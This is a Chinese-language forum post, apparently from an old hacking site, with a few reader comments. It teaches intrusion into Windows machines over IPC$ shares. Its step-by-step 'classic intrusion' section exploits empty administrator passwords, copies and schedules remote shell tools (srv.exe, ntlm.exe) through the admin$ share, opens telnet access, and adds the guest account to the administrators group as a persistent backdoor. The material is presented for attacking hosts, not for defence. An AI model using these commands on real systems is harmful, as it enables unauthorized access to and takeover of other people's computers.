探索與發現

1)建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)

2)建立非空連接:
net use \\IP\ipc$ "密碼" /user:"用戶名" (同樣有3個空格)

3)映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤，其他盤類推)
如果已經和目標建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$

4)刪除一個ipc$連接
net use \\IP\ipc$ /del

5)刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del 刪除全部,會有提示要求按y確認

3 查看遠程主機的共享資源（但看不到默認共享）
net view \\IP

4 查看本地主機的共享資源（可以看到本地的默認共享）
net share

5 得到遠程主機的用戶名列表
nbtstat -A IP

6 得到本地主機的用戶列表
net user

7 查看遠程主機的當前時間
net time \\IP

8 顯示本地主機當前服務
net start

9 啟動/關閉本地服務
net start 服務名 /y
net stop 服務名 /y

10 映射遠程共享:
net use z: \\IP\baby
此命令將共享名為baby的共享資源映射到z盤

11 刪除共享映射
net use c: /del 刪除映射的c盤，其他盤類推
net use * /del /y刪除全部

12 向遠程主機復制文件
copy \路徑\srv.exe \\IP\共享目錄名，如：
copy ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內

13 遠程添加計劃任務
at \\ip 時間 程序名，如：
at \\127.0.0.0 11:00 love.exe
注意：時間盡量使用24小時制；在系統默認搜索路徑（比如system32/）下不用加路徑，否則必須加全路徑
14 開啟遠程主機的telnet
這里要用到一個小程序：opentelnet.exe，各大下載站點都有，而且還需要滿足四個要求：

1）目標開啟了ipc$共享
2）你要擁有管理員密碼和帳號
3）目標開啟RemoteRegistry服務，用戶就該ntlm認證
4）對WIN2K/XP有效，NT未經測試
命令格式：OpenTelnet.exe \\server account psw NTLM認證方式 port
試例如下：c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用戶/加入管理員組
1 net uesr account /active:yes
2 net localgroup administrators account /add

16 關閉遠程主機的telnet
同樣需要一個小程序：ResumeTelnet.exe
命令格式：ResumeTelnet.exe \\server account psw
試例如下：c:\>ResumeTelnet.exe \\*.*.*.* administrator ""

17 刪除一個已建立的ipc$連接
net use \\IP\ipc$ /del

九 經典入侵模式
這個入侵模式太經典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創作者!(不知道是哪位前輩)

1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators，密碼為"空"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為"空"，所以第一個引號處就不用輸入，后面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。
復制之前務必用net view \\IP這個命令看一下對方的共享情況
2. C:\>copy srv.exe \\127.0.0.1\admin$
先復制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\winnt\system32\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復制到什么地方去了）。

3. C:\>net time \\127.0.0.1
查查時間，發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00，命令成功完成。

4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧（這里設置的時間要比主機時間快，不然你怎么啟動啊，呵呵！）

5. C:\>net time \\127.0.0.1
再查查到時間沒有？如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05，那就準備開始下面的命令。

6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧，注意端口是99。Telnet默認的是23端口，但是我們使用的是SRV在對方計算機中為我們建立一個99端口的Shell。
雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務！這就要用到ntlm了

7.C:\>copy ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上（ntlm.exe也是在《流光》的Tools目錄中）。

8. C:\WINNT\system32>ntlm
輸入ntlm啟動（這里的C:\WINNT\system32>指的是對方計算機，運行ntlm其實是讓這個程序在對方計算機上運行）。當出現"DONE"的時候，就說明已經啟動正常。然后使用"net start telnet"來開啟Telnet服務！

9. Telnet 127.0.0.1，接著輸入用戶名與密碼就進入對方了，操作就像在DOS上操作一樣簡單！(然后你想做什么?想做什么就做什么吧,哈哈)

為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活

11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼

12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機)

另外,你也可以根據返回的錯誤號分析原因：

錯誤號5，拒絕訪問：很可能你使用的用戶不是管理員權限的，先提升權限；
錯誤號51，Windows無法找到網絡路徑：網絡有問題；
錯誤號53，找不到網絡路徑：ip地址錯誤；目標未開機；目標lanmanserver服務未啟動；目標有防火墻（端口過濾）；
錯誤號67，找不到網絡名：你的lanmanworkstation服務未啟動或者目標刪除了ipc$；
錯誤號1219，提供的憑據與已存在的憑據集沖突：你已經和對方建立了一個ipc$，請刪除再連；
錯誤號1326，未知的用戶名或錯誤密碼：原因很明顯了；
錯誤號1792，試圖登錄，但是網絡登錄服務沒有啟動：目標NetLogon服務未啟動；
錯誤號2242，此用戶的密碼已經過期：目標有帳號策略，強制定期要求更改密碼   回復  更多評論
  

謝謝樓主 提供的教程和代碼 非常不錯
http://alzhai.com/post-17.html  回復  更多評論
  

不好使啊  回復  更多評論
  

打錯了，好使  回復  更多評論